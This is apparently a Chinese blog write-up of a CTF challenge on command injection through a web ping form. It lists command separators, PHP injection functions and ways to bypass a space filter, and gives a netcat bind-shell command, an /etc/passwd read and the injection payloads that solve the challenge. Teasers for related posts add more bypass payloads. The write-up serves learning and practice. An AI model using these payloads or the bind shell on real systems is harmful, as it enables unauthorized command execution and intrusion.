【WEB】利用PING命令注入执行分析

最新推荐文章于 2024-06-03 10:50:52 发布
最新推荐文章于 2024-06-03 10:50:52 发布
阅读量9.1k 收藏 13
点赞数 2
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014549283/article/details/81783164
版权

题目地址 

https://www.mozhe.cn/bug/detail/RWpnQUllbmNaQUVndTFDWGxaL0JjUT09bW96aGUmozhe

资料

http://poetichacker.com/writeup/由iscc2018-web-ping学习命令注入.html

姿势 

  • 命令连接符
    command1 && command2   先执行command1后执行command2
    command1 | command2     只执行command2
    command1 & command2    先执行command2后执行command1

  • ”<” 表示的是输入重定向的意思,就是把<后面跟的文件取代键盘作为新的输入设备。”| ”则表示一个管道的意思,可以理解为东西从管道的一边流向另外一边。
  • 检测一阶命令注入的最佳方式是尝试执行一个sleep命令
  • 在外部可以访问的端口上生成一个shell(仅适用于自定义netcat构建):nc -l -n -vv -p 80 -e /bin/bash (unix) 或 nc -l -n -vv -p 80 -e cmd.exe (windows)。
  • 如果想要知道目标主机名的长度,我们可以将主机名的输出通过管道符传递给wc -c命令。

  • 常见php命令注入函数:

    eval(),,assert(), system(),preg_replace(), create_function, call_user_func, call_user_func_array,
array_map(),反引号,ob_start(),exec(),shell_exec(),
passthru(),escapeshellcmd(),popen(),proc_open(),pcntl_exec()

    命令注入中有讲究的字符

    '$'
    ';'
    '|'
    '-'
    '('
    ')'
    '反引号'
    '||'
    ————以上是上题过滤的。
    以下是查到的其他的:
    '&&'
    '&'
    '}'
    '{'

绕过

防护措施中使用最多的就是对于payload中空格的限制。

OS命令注入中的空格:

花括号扩展:

  • bash
    空格可以替换为%20、%09(tab)、%2b(+) in url、{IFS}
  • Win shell
    空格可以替换为%20、%09(tab)、%0b、%0c、%2b(+) in url
  • 如:;{cat,/etc/passwd}'

解法

几个命令: ls ,cat< ,cat

 由于此题是前端ip格式显示,burp抓包后该数据为127.0.0.1|ls可以查看key文件名称。

然后127.0.0.1|cat<key_1257293387526.php可以查看内容。

此处由于空格被过滤,所以用<替代

pcy190
关注
  • 2
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
日常练习之web(Ping Ping Ping)
doraemon12345的博客
11-26 1033
打开题目是/?ip= 猜测应该是命令执行,先试一下?ip=127.0.0.1;cat flag 发现过滤了空格,尝试?ip=127.0.0.1;ls 发现flag.php,绕过空格 /?ip=127.0.0.1;cat$IFS$9flag.php flag被过滤了,换一种方法先看看index.php /?ip=127.0.0.1;cat$IFS$9index.php 发现bash也没了,不过可以用sh来执行 echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh Y2F0
服务端安全之系统命令注入
好记性不如烂笔头
03-13 1071
原文出处:https://portswigger.net/web-security/os-command-injection 本节我们介绍什么是系统命令注入,描述这种漏洞如何发现以及如何利用,阐述在不同的操作系统上有用的命令和技术,以及总结如何阻止系统命令注入。 什么是命令注入 OS命令注入(也称为shell注入)是一种web安全问题,允许攻击者可以执行任意系统命令执行任意命令 考虑这样一个购物应用程序,它允许用户查看特定商店中的商品是否有货。该信息可以通过如下URL访问: https://insec
php ping 命令注入,CTF关于ping命令注入问题
weixin_39935777的博客
04-02 1344
题目样式对于看到ping或者ping命令却没有弄waf时就要想到命令注入。具体注入方法看到ping命令就可以利用截断来执行新的命令。首先测试所有的截断符号:‘$’‘;’‘|’‘-’‘(’‘)’‘反引号’‘||’‘&&’‘&’‘}’‘{’'%0a’可以当作空格来用;利用截断符号配合普通命令简单问题基本就出来;例如:ip=127.0.0.1;cat /home/flag.txt...
CTF中的命令执行绕过方式
最新发布
2401_84466223的博客
06-03 728
cat $b$a绕过空格就用上面提到的$IFS$1完整的payload 1;shell 提供了 && 和 || 来实现命令执行控制的功能,shell 将根据 && 或 || 前面命令的返回值来控制其后面命令执行。连续使用管道意味着第一个命令的输出会作为 第二个命令的输入,第二个命令的输出又会作为第三个命令的输入,依此类推。默认情况下,进程是前台进程,这时就把Shell给占据了,我们无法进行其他操作,对于那些没有交互的进程,很多时候,我们希望将其在后台启动,可以在启动参数的时候加一个'&'实现这个目的。
CTF关于ping命令注入问题(1)
热门推荐
欢迎来到神林的博客
03-07 1万+
题目样式 对于看到ping或者ping命令却没有弄waf时就要想到命令注入。 具体注入方法 看到ping命令就可以利用截断来执行新的命令。 首先测试所有的截断符号: ‘$’ ‘;’ ‘|’ ‘-’ ‘(’ ‘)’ ‘反引号’ ‘||’ ‘&amp;&amp;’ ‘&amp;’ ‘}’ ‘{’ '%0a’可以当作空格来用; 利用截断符号配合普通命令简单问题基本就出来; 例如:ip=127.0.0.1...
命令注入
extremecold
09-02 6471
命令:这里指的是操作系统的命令 命令注入:通过web程序,在服务器上拼接系统命令命令注入流程: 是否调用系统命令 函数或函数的参数是否可控 是否拼接注入命令 low等级 正常情况下,是ping一个IP地址。确定调用系统命令 确定可控字段 确定命令语句,&amp;amp;&amp;amp;可以连接两条Windows命令 验证 medium等级 一个&amp;amp;也可以...
深入命令注入漏洞
Websec
10-23 9368
参考文章:https://mp.weixin.qq.com/s/VssTiWz-oExFqdEkiE9J4g   命令注入是一种常见的漏洞形态。一旦存在命令注入漏洞,攻击者就可以在目标系统执行任意命令。说到这里,我们不得不提另外一个叫做远程代码执行(RCE)的漏洞。许多人总会把这两个漏洞混淆,其实它们是有本质的区别的。命令执行只是针对系统命令,而远程代码执行针对的是编程代码,两者互不能替换。下...
CTFping命令绕过及符号用法
Hardworking666的博客
10-13 9860
文章目录一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ig..
命令注入讲解ppt.pptx
08-10
最常见的命令注入攻击形式是 SQL 命令注入攻击(简称 SQL 注入),是指恶意黑客利用设计上的安全漏洞,把 SQL 代码粘贴在网页形式的输入框内,进而改变服务端数据。 PHP 应用程序中也有名为 PHP 命令注入攻击的漏洞...
测试脚本注入.docx
09-06
例如,使用`system('ping 127.0.0.1')`或者其URL编码形式`system('ping%20127.0.0.1')`,如果应用执行了这个命令,会等待网络响应,导致服务器响应时间显著增加。这种延迟可以作为判断脚本是否执行的间接证据。 5. ...
js调用计算机命令
09-13
然而,通过特定的方法和库,JS也能调用计算机的系统命令,这为开发者提供了更多的可能性,比如自动化某些任务、执行系统级别的操作,或者与本地资源进行交互,从而提升Web项目的用户体验。 ### JS调用计算机命令 ...
web页面实现ping 命令
02-02
在网页上实现ping命令,可以扩展到Tracert命令 在网页上实现ping命令,可以扩展到Tracert命令
啊D注入工具+ 啊D网络工具包
01-08
啊D注入工具可以自动化地对目标网站进行SQL注入测试,找出可能存在的注入点,并尝试执行各种SQL命令,以评估系统的安全风险。 其主要功能包括: 1. 自动化扫描:工具能自动遍历网站的URL,寻找潜在的注入点。 2. ...
E007-渗透测试常用工具-使用darkmysqli进行sql注入.pdf
12-02
我们首先确保两台机器之间的网络连通性,通过ping命令验证192.168.1.174(渗透机)与192.168.1.193(靶机)之间的通信。 接着,我们访问靶机的IP地址http://192.168.1.193/sqls/index.php?id=1,发现URL中的id参数...
Web安全——命令注入漏洞详解
Boom!脑洞大爆炸的博客
06-09 1万+
手把手入门命令注入漏洞
BUUCTF [GXYCTF2019]Ping Ping Ping
m0_49025459的博客
04-30 684
题目 打开网站 就这么点东西,啥都没有,那么我们浅试一下 那我们ls一下将文件名都输出出来,我们用几种方式都可以输出文件名 ?ip=127.0.0.1|ls ?ip=127.0.0.1;ls ?ip=127.0.0.1||ls 这里都是用了Windows中的管道符命令 | 直接执行后面的语句,例如 ping 127.0.0.1|whoami ||如果前面执行的语句出错,才执行后面的语句,所以前面的语句必须为假,例如 ping 1||whoami &前面的...
BUUCTF Web pingpingping
CrotZZ的博客
07-03 454
打开后 没什么提示 试了下cat flag,空格好像是被过滤了 去空格,flag也被过滤 根据题目是ping 所以得先ip=127.0.0.1返回结果是这样的 ls看有什么文件,flag已经被过滤 试了下一些绕过空格的方法,得到index.php里面的内容,虽然有些看不懂但大致意思还是明白,空格、bash、命令里是否有flag 都被过滤 这里是用了echo$IFS9Y2F0IGZsYWcucGhw∣base649Y2F0IGZsYWcucGhw|base649Y2F0IGZsYWcucGh
浅谈Ping 攻击
G_host的专栏
08-18 9044
前述:由于本人还不是菜鸟而且技术学识方面浅。故不能用专业术语来描述,请谅解。我们上网冲浪的时候,或许防火墙突然报警“禁止XXX IP 进入”。其实在默认的情况下,我们的防火墙是绝对禁止PING进入的。至于PING 攻击者的方法,他可能是利用攻击器来进行攻击,但也可能是用 DOS 里的PING命令来进行的。。。。。。对于别人PING攻击的目的,我们很难预测。。。。。。然而好多时候PING攻击者是
Ping Ping Ping命令执行环境搭建
08-25
Ping命令执行环境搭建的方法如下: 1. 首先,找到系统中ping.exe所在的目录,并将该目录添加到环境变量Path中。这样,系统才能够找到并执行ping命令。如果系统中没有ping.exe,可以从网上下载并上传到相应的目录,但需要注意对下载文件的md5进行比对以确保文件的完整性和安全性。 2. 如果在执行ping命令时出现了优先级被其他变量覆盖的情况,可以检查系统中的变量设置,确保ping命令的路径没有被其他变量覆盖。在某些情况下,可能会出现输入ping命令实际上是按照其他程序进行处理的情况。例如,在某些机器上,默认情况下py文件可能被关联到Pycharm程序,导致输入ping命令时实际上是按照py文件进行处理,从而出现了执行错误。 3. 如果您在嵌入式Linux开发环境中进行ping命令执行的搭建,可以参考相关教程和指南。在嵌入式Linux开发环境中,可能需要特定的设置和配置才能够正确执行ping命令。可以参考针对嵌入式Linux开发环境搭建ping命令执行环境的教程和解决方法,以便正确配置和使用ping命令。 请根据您的具体情况选择适合的方法进行Ping命令执行环境搭建。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [解决ping命令无法使用-环境变量优先级问题](https://blog.csdn.net/weixin_53009585/article/details/129974569)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [嵌入式Linux开发环境搭建ping、nfs的解决方法](https://download.csdn.net/download/weixin_38665122/12842006)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值